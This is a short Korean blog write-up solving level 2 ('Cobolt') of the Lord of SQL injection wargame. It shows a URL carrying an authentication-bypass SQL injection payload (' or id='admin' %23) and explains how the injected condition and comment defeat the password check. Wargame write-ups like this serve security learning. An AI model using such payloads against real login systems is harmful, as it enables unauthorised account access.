Lord Of SQL injection [ 2.Cobolt ]

2017. 9. 8. 18:43WebHacking/Lord of SQL injection

 




URL: https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php?id=admin&pw=1234' or id='admin' %23

=> SELECT id FROM prob_cobolt WHERE ( id='admin' and pw='hash값' ) or id='admin' #')

=> 뒤의 조건식 id=admin이 만족되어 쿼리문이 실행된다